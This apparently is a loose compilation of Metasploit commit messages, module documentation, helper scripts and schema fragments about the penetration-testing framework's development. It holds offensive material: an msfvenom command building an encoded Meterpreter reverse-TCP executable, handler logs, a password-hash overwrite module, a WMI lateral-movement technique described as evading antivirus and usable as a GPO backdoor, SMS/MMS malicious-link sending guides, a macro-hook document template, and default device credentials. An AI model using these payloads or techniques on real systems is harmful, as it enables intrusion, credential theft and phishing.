Some railgun definitions for the kernel32 module define DWORD for the
functions return type when it should be HANDLE. This causes errors on
64-bit systems when the return value is truncated.
If we pass all the phone numbers at once in one email, it becomes
a group chat, and that allows the recipients to see each other's
number, which isn't the intended behavior.
Adds a basic Dockerfile and docker-compose config. `docker-compose.yml`
adds a named volume for postgres so data should persist.
`$HOME/.msf4` will be mounted to `/root/.msf4` by default.
port 4444 is exposed by default
Basic Usage:
docker/bin/msfconsole
docker/bin/msfvenom
This PR enables connection to a Nexpose console using the
nexpose client gem.
It also allows you to connect using a trusted certificate
instead of simply overriding the SSL validation.
This PR enables connection to a Nexpose console using the
nexpose client gem.
It also allows you to connect using a trusted certificate
instead of simply overriding the SSL validation.
The shell does exactly the same as the previous, just made the code read much
better so as to not severely anger the gray beards and other lesser
mainframe deities. The only architectural change is the payload uses the
spawn system call vs exec - this provides for a cleaner exit in some cases.
The check_setup method expects an error message if the
web server is not compatible with the module, and false otherwise.
We were previously returning the opposite of the expected behavior.
The owa_login module currently misses a success condition where the
creds are valid but there is no mailbox setup. This commit adds the
check for the condition for OWA 2013.
This commit sets two more options to `0` in the payload:
- [cgi.force_redirect](https://secure.php.net/manual/en/ini.core.php#ini.cgi.force-redirect)
- [cgi.redirect_status_env](https://secure.php.net/manual/en/ini.core.php#ini.cgi.redirect-status-env)
The configuration directive `cgi.force_redirect` prevents anyone from calling PHP
directly with a URL like http://my.host/cgi-bin/php/secretdir/script.php.
Instead, PHP will only parse in this mode if it has gone through a web server redirect rule.
The string set in the configuration directive `cgi.redirect_status_env`
is the one that PHP will look for to know it's ok to continue its
execution. This might be use together with the previous configuration
option as a security measure.
Setting those variables to 0 is (as stated in the documentation) a
security issue, but it also make the exploit work on some Apache2 setup.
Array2Hex in the automotive extension how supports passing an array or integers or string hexes
Added some extra error handling for UDS calls to non-supported pids
Things like browser exploits don't have remote host options
which is what auto targeting relies on, so it does not make sense
to include the auto-targeting in these exploits
7837
the fallback to the original default was failing because
it was assuming rhost was already set, so it would always
go back to the first default target. now the auto_target? method
only returns true if can pull an auto_target_host
the run_cmd method on meterpreter sessions can now
take an optiona output IO to redirect output. This allows
backgrounded sessions to also run commands and still output
to the console
the target selection actually adjust the datastore
as if a user selected the target, this prevents
a mismatch between the target and the target index
MS-2325
if the module authour added an automatic target
we skip our routine, to let the module's own automatic targeting
take over as it likely be better
MS-2325
targets now filtered by OS name, but a little
more processing may be needed on this part because
it looks like what you'd expect in os_flavor gets jammed
into name instead
MS-2325
This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
1. Fix crash when no arguments are specified
2. Print history index starting at 1 like every shell
3. Fixed wording/phrasing
4. Fixed formatting/whitespace
Added the "history" command to see a list of commands used before.
```
msf exploit(handler) > history -n 4
2344 set PAYLOAD windows/meterpreter/reverse_tcp
2345 set LHOST 10.0.1.109
2346 exploit
2347 history -n 4
msf exploit(handler) > history -h
Usage: history [options]
Show the command history
OPTIONS:
-a Show length commands in history
-h Help banner.
-n <opt> Show the last n commands
msf exploit(handler) >
```
This commit adds a "to_handler" command to msfconsole when "using" a payload.
After generating a payload from msfconsole, we needed to set multi/handler and the payload with the same param as we used to generate it. That was really boring...
The to_handler command creates the handler and sets the payload and the options set for it.
### Example Output:
```
msf > use payload/windows/meterpreter_reverse_tcp
msf payload(meterpreter_reverse_tcp) > set LHOST 10.0.1.109
LHOST => 10.0.1.109
msf payload(meterpreter_reverse_tcp) > set LPORT 3377
LPORT => 3377
msf payload(meterpreter_reverse_tcp) > show options
Module options (payload/windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.0.1.109 yes The listen address
LPORT 3377 yes The listen port
msf payload(meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 10.0.1.109:3377
[*] Starting the payload handler...
msf payload(meterpreter_reverse_tcp) >
```
I think PAYLOADSTR should take precedence over PAYLOADFILE. Usually,
you'll use PAYLOADFILE but might want to override with PAYLOADSTR. I
doubt this change will hurt anyone, since few people set both at once.
The payload description even says "either," so there's that.
It is inferred from the platform, and we don't want to override it
needlessly. :bourne is what worked during testing, but it won't always
work. Now we can override the flavor with CMDSTAGER::FLAVOR.
msf > use auxiliary/admin/http/nuuo_nvrmini_reset
msf auxiliary(nuuo_nvrmini_reset) > show
show actions show all show encoders show exploits show missing show options show plugins show targets
show advanced show auxiliary show evasion show info show nops show payloads show post
This commit changes the post mixin so that the session compat check only
shows a warning rather than throwing an exception and stopping the
module from working completely.
This is off the back of the discussion involved with #7736
This streamlines the check for whether the currently-selected payload is
compatible on assignment. Rather than building the entire list of
compatible payloads, and seeing if what the user typed is in it (and
making multiple giant lists on the way), we simply check the module the
user typed directly.
Lots of people have been frustrated by the `sess` command as it mucks
with the autocomplete for `sessions`. This is a fair concern, especially
given that `sess` was intended to be a non-annoying shortcut.
This commit changes the `sess` command so that it is instead called
`terminal`. I couldn't think of a better option that didn't already
clash with another name or meaning. At least `terminal` is something
that doesn't clash, doesn't muck with any existin autocomplete rules,
and is in some way another name for the existing sessions.
Feedback appreciated!
Line originally references the read_timeout instance variable associated with the smb variable (line 118 || 120), which is an object of the simpleclient class that doesn't have a read_timeout instance variable. Updated the line to reference the client instance variable of smb, which does have a read_timeout variable. Testing this change appears to result in expected behavior.
This module "carves" a hash in the registries to set it as a user password.
The benefits are:
1/ It doesn't change the password last change field
2/ You can set a hash directly, so you can change a user's password and revert it without cracking its hash.
I have tested it in Windows 7, and 8.1. Should work on every version though.
Usage:
run post/windows/manage/hashcarve user=test pass=<password>
run post/windows/manage/hashcarve user=test pass=<nthash>
run post/windows/manage/hashcarve user=test pass=<lmhash:nthash>
This work is based on the hashdump implementation.
sometimes, as a user, you need to start a handler
but don't want to exit your current console context.
The new handler command allows a user to spin up a handler
in background job without switching contexts
the async output fix was put in the parent UI IO
class when it only really makes sense in stdio.
Those ctrl sequences will noly be understood if output to a
terminal.
MS-2298
Documentation, compiled binary and final implementation.
Completed the documentation, added the missing compiled binary and a
final and tested implementation of the module.
Came up on Twitter, where Justin may have been trolling a little:
https://twitter.com/jstnkndy/status/798671298302017536
We have a `print_good` method, but not a `print_bad`, which seems a
little weird for Ruby -- opposite methods should be intuitive as Justin
is implying.
Anyway, I went with alias_method, thanks to the compelling argument at
https://github.com/bbatsov/ruby-style-guide#alias-method
...since Metasploit is all about the singleton, and didn't want to risk
some unexpected scoping thing.
Also dang, we define the `print_` methods like fifty billion times!
Really should fix that some day.
when we cleaned up all the other powershell template refs
we missed the one in this module which seems to e replicating
large ammounts of library code
7533
when we cleaned up all the other powershell template refs
we missed the one in this module which seems to e replicating
large ammounts of library code
7533
This module was inspired by the work done by Matt Nelson and Matt
Graeber who came up with the method in the first place. This works
nicely on a fully patched Windows 10 at the time of writing.
This commit moves much of the platform-specific logic from the
reverse_http handler down into the payloads. This makes the handler
a bit more agnostic of what the payload is (which is a good thing).
There is more to do here though, and things can be improved.
Handling of datastore settings has been changed to make room for the
ability to override the datastore completely when generating the
payloads. If a datastore is given via the `opts` then this is used
instead otherwise it falls back to the settings specified in the usual
datatstore location.
Down the track, we'll have a payload that supports multiple stages, and
the datastore will be generated on the fly, along with the stage itself.
Without this work, there's no other nice way of getting datastore
settings to be contained per-stager.
It was found that Internet Explorer allows the disclosure of local file
names. This issue exists due to the fact that Internet Explorer behaves
different for file:// URLs pointing to existing and non-existent files.
When used in combination with HTML5 sandbox iframes it is possible to
use this behavior to find out if a local file exists. This technique
only works on Internet Explorer 10 & 11 since these support the HTML5
sandbox. Also it is not possible to do this from a regular website as
file:// URLs are blocked all together. The attack must be performed
locally (works with Internet zone Mark of the Web) or from a share.
Multiple DLL side loading vulnerabilities were found in various COM
components.
These issues can be exploited by loading various these components as an
embedded
OLE object. When instantiating a vulnerable object Windows will try to
load one
or more DLLs from the current working directory. If an attacker
convinces the
victim to open a specially crafted (Office) document from a directory
also
containing the attacker's DLL file, it is possible to execute arbitrary
code with
the privileges of the target user. This can potentially result in the
attacker
taking complete control of the affected system.
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
Powerhell provides direct interface to WMI, allowing users in UAC
or otherwise restricted context to attain privileged resources via
impersonation. Moreover, WMI allows for execution remotely, on any
endpoint attainable via DCOM. In practice, this allows foothold on
a single domain host to immediately infect every machine accessible
via DCOM either from the currently held privileged context (such as
a domain administrator) or from a new context generated by entering
acquired credentials.
Payloads, remote commands, and collection activities can be invoked
without direct IP connectivity on a remote host, and output can
be collected the same way.
Of particular note when implementing this technique is that admin
contexts resulting from this form of execution are not encapsulated
in UAC, allowing for immediate privesc to system if creating a new
session.
Old notes show that loopback exec is not stable or usable, though
this merits further research as it seems the native way to avoid
UAC altogether without any exploitation.
As with all the other powershell vectors, this mechanism provides
in-memory execution, and in all our testing walks right through the
AV currently out there since it has no service executable, on-disk
footprint, or even error log from the improper service exit that
psexec causes. Sandboxes dont cover powershell - too much runtime
entropy and some quite legitimate use of sockets and unmanaged
memory marshalling to get a good "guess" of what the code is trying
to do.
Makes for a great gift left behind in GPO startup scripts or other
latent backdoor approaches. Since a script is produced, those with
the need and craft can alter the resulting scripts to dynamically
enumerate domain hosts meeting their needs for exploitation at
runtime, as opposed to the "brute-force" approach used here.
-----
Testing:
The internal module has been in use for over three years in our
fork. Its been instrumental in showing several clients what it
means to be "pwned" in 30s flat. This particular version has been
slightly altered for upstream consumption and should be tested
again by community and developers alike in the upstream branch.
Note:
Word to the wise on target selection - choose carefully, it is
possible to generate more sessions than an L3 pivoted handler can
comfortably address, and having a thousand reverse_tcp sessions
going past the edge is sure to raise an eyebrow at the SOC.
2016-03-04 19:31:55 -05:00
1137 changed files with 37961 additions and 10654 deletions
<w:fontsxmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml"xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml"mc:Ignorable="w14 w15"><w:fontw:name="Calibri"><w:panose1w:val="020F0502020204030204"/><w:charsetw:val="00"/><w:familyw:val="swiss"/><w:pitchw:val="variable"/><w:sigw:usb0="E10002FF"w:usb1="4000ACFF"w:usb2="00000009"w:usb3="00000000"w:csb0="0000019F"w:csb1="00000000"/></w:font><w:fontw:name="Times New Roman"><w:panose1w:val="02020603050405020304"/><w:charsetw:val="00"/><w:familyw:val="roman"/><w:pitchw:val="variable"/><w:sigw:usb0="E0002AFF"w:usb1="C0007841"w:usb2="00000009"w:usb3="00000000"w:csb0="000001FF"w:csb1="00000000"/></w:font><w:fontw:name="Calibri Light"><w:panose1w:val="020F0302020204030204"/><w:charsetw:val="00"/><w:familyw:val="swiss"/><w:pitchw:val="variable"/><w:sigw:usb0="A00002EF"w:usb1="4000207B"w:usb2="00000000"w:usb3="00000000"w:csb0="0000019F"w:csb1="00000000"/></w:font></w:fonts>
<office:document-contentxmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0"xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0"xmlns:xlink="http://www.w3.org/1999/xlink"xmlns:dc="http://purl.org/dc/elements/1.1/"xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0"xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0"xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0"xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0"xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0"xmlns:math="http://www.w3.org/1998/Math/MathML"xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0"xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"xmlns:ooo="http://openoffice.org/2004/office"xmlns:ooow="http://openoffice.org/2004/writer"xmlns:oooc="http://openoffice.org/2004/calc"xmlns:dom="http://www.w3.org/2001/xml-events"xmlns:xforms="http://www.w3.org/2002/xforms"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:rpt="http://openoffice.org/2005/report"xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2"xmlns:xhtml="http://www.w3.org/1999/xhtml"xmlns:grddl="http://www.w3.org/2003/g/data-view#"xmlns:tableooo="http://openoffice.org/2009/table"xmlns:textooo="http://openoffice.org/2013/office"xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0"office:version="1.2"><office:scripts><office:event-listeners><script:event-listenerscript:language="ooo:script"script:event-name="dom:load"xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&location=document"xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-facestyle:name="Mangal1"svg:font-family="Mangal"/><style:font-facestyle:name="Times New Roman"svg:font-family="'Times New Roman'"style:font-family-generic="roman"style:font-pitch="variable"/><style:font-facestyle:name="Arial"svg:font-family="Arial"style:font-family-generic="swiss"style:font-pitch="variable"/><style:font-facestyle:name="Mangal"svg:font-family="Mangal"style:font-family-generic="system"style:font-pitch="variable"/><style:font-facestyle:name="Microsoft YaHei"svg:font-family="'Microsoft YaHei'"style:font-family-generic="system"style:font-pitch="variable"/><style:font-facestyle:name="SimSun"svg:font-family="SimSun"style:font-family-generic="system"style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body>DOCBODYGOESHER<office:text><text:sequence-decls><text:sequence-decltext:display-outline-level="0"text:name="Illustration"/><text:sequence-decltext:display-outline-level="0"text:name="Table"/><text:sequence-decltext:display-outline-level="0"text:name="Text"/><text:sequence-decltext:display-outline-level="0"text:name="Drawing"/></text:sequence-decls><text:ptext:style-name="Standard"/></office:text></office:body></office:document-content>
add_index"metasploit_credential_cores",["workspace_id","private_id"],name:"unique_private_metasploit_credential_cores",unique:true,where:"(((realm_id IS NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","public_id","private_id"],name:"unique_realmless_metasploit_credential_cores",unique:true,where:"(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","public_id"],name:"unique_public_metasploit_credential_cores",unique:true,where:"(((realm_id IS NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","private_id"],name:"unique_publicless_metasploit_credential_cores",unique:true,where:"(((realm_id IS NOT NULL) AND (public_id IS NULL)) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","public_id","private_id"],name:"unique_complete_metasploit_credential_cores",unique:true,where:"(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","public_id"],name:"unique_privateless_metasploit_credential_cores",unique:true,where:"(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","private_id"],name:"unique_private_metasploit_credential_cores",unique:true,where:"((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","public_id","private_id"],name:"unique_realmless_metasploit_credential_cores",unique:true,where:"((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","public_id"],name:"unique_public_metasploit_credential_cores",unique:true,where:"((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","private_id"],name:"unique_publicless_metasploit_credential_cores",unique:true,where:"((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","public_id","private_id"],name:"unique_complete_metasploit_credential_cores",unique:true,where:"((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))",using::btree
add_index"metasploit_credential_cores",["workspace_id","realm_id","public_id"],name:"unique_privateless_metasploit_credential_cores",unique:true,where:"((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))",using::btree
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@"
The administrator application was removed as of Tomcat 6. Tomcat 5.5.36 is available from [apache](https://archive.apache.org/dist/tomcat/tomcat-5/v5.5.36/). This does not have the `admin` app bundled though, and can be downloaded [here](https://archive.apache.org/dist/tomcat/tomcat-5/v5.5.36/bin/apache-tomcat-5.5.36-admin.zip).
To utilize the `admin` application, a user must have the permission `admin` applied to their account. The following user line will handle all necessary permissions:
The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
collection of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
against multiple phone numbers, ideally you want to create the list in a text file (one number per
line), and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be the same carrier.
**MMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**TEXTMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set TEXTMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**MMSFILE**
The attachment to send in the message.
**MMSFILECTYPE**
The content type to use for the attachment. Commonly supported ones include:
* audio/midi
* image/jpeg
* image/gif
* image/png
* video/mp4
To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)
**SMTPADDRESS**
The mail server address you wish to use to send the MMS messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
in order to receive the text, such as AT&T.
**MMSSUBJECT**
The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
## Supported Carrier Gateways
The module supports the following carriers:
* AT&T
* Sprint
* T-Mobile
* Verizon
* Google Fi
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
so we will demonstrate as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
multiple phone numbers, ideally you want to create the list in a text file (one number per line),
and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be the same carrier.
**SMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**SMSMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set SMSMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**SMTPADDRESS**
The mail server address you wish to use to send the text messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
## Supported Carrier Gateways
The module supports the following carriers:
* AllTel
* AT&T Wireless
* Boost Mobile
* Cricket Wireless
* Google Fi
* T-Mobile
* Verizon
* Virgin Mobile
**Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
not supported.
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
**Note:** If the phone is using Google Fi, then it may appear as a different carrier.
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
so we will demonstrate as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
This module allows you to log into an BAVision IP Camera's web server.
The instructions shipped with the camera do not mention clearly regarding the existence of the
lighttpd web server, and it uses admin:123456 as the default credential. Even if the default
password is changed, the account could also be bruteforced since there is no policy for lockouts.
## Vulnerable Application
The web server is built into the IP camera. Specifically, this camera was tested during development:
"BAVISION 1080P HD Wifi Wireless IP Camera Home Security Baby Monitor Spy Pet/Dog Cameras Video Monitoring Plug/Play,Pan/Tilt With Two-Way Audio and Night Vision"
http://goo.gl/pHAqS1
## Verification Steps
1. Read the instructions that come with the IP camera to set it up
2. Find the IP of the camera (in lab, your router should have info about this)
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
This module is a scanner which enumerates Google Chromecast via its HTTP interface (default port 8008). The WiFi access point the Chromecast is also enumerated.
This module is a scanner which enumerates WiFi access points visible from a Google Chromecast via its HTTP interface (default port 8080). Any WiFi access point the Chromecast is associated with or can be associated with is marked with an `(*)`.
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existance. The idea behind rpcbind was to create a
'directory' that could be asked where a service is running (port). Having this single port/service be queryable meant, the services being managed by rpcbind
could actually be running on any port or protocol, and rpdbind would be in charge of letting clients know where they were. This is more or less an outdated
model/service, and NFS is arguably the most popular service still utilizing rpcbind. The following was done on Kali linux:
1. Install rpcbind: `apt-get install rpcbind`
2. Now now have `rpcbind`, but this gives us minimal services running on it. You may want to install additional:
* NIS: `apt-get install nis`
* Start the service: `ypserv`
* NFS: `apt-get install nfs-kernel-server`
3. Just to be safe, restart rpcbind: `service rpcbind restart`
NFS is very common, and this scanner searches for a mis-configuration, not a vulnerable software version. Installation instructions for NFS can be found for every operating system.
The [Ubuntu 14.04](https://help.ubuntu.com/14.04/serverguide/network-file-system.html) instructions can be used as an example for installing and configuring NFS. The
4. Restart the service: `service nfs-kernel-server restart`
In this scenario, `closed_share` is set to read only, and only mountable by the IP 10.1.2.3. `open_share` is mountable by anyone (`*`) in read/write mode.
Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
Installation instructions for SNMP server can be found for every operating system.
The [Ubuntu 14.04](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-an-snmp-daemon-and-client-on-ubuntu-14-04) instructions can be used as an example for installing and configuring NFS. The
following was done on Kali linux:
1.`sudo apt-get install snmpd`
2. Set SNMP to listen on non-localhost: `nano /etc/snmp/snmpd.conf`
```
# Listen for connections from the local system only
#agentAddress udp:127.0.0.1:161
# Listen for connections on all interfaces (both IPv4 *and* IPv6)
agentAddress udp:161,udp6:[::1]:161
```
3. Restart the service: `service snmpd restart`
### SNMP Versions
SNMP has 3 main versions.
* **1**, **2c**: both use simple password protection (string), and are often defaulted to `public` (read only), and `private` (read/write). Version 2 is backwards compatible with version 1. This is a plaintext protocol and is vulenrable to being intercepted.
* **3**: has several security levels and is significantly more complex, but also not covered in this module.
## Verification Steps
1. Install and configure SNMP
2. Start msfconsole
3. Do: `use auxiliary/scanner/snmp/snmp_login`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(snmp_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Linux hostname 4.9.0-kali1-amd64 #1 SMP Debian 4.9.6-3kali2 (2017-01-30) x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[*] Scanned 24 of 58 hosts (41% complete)
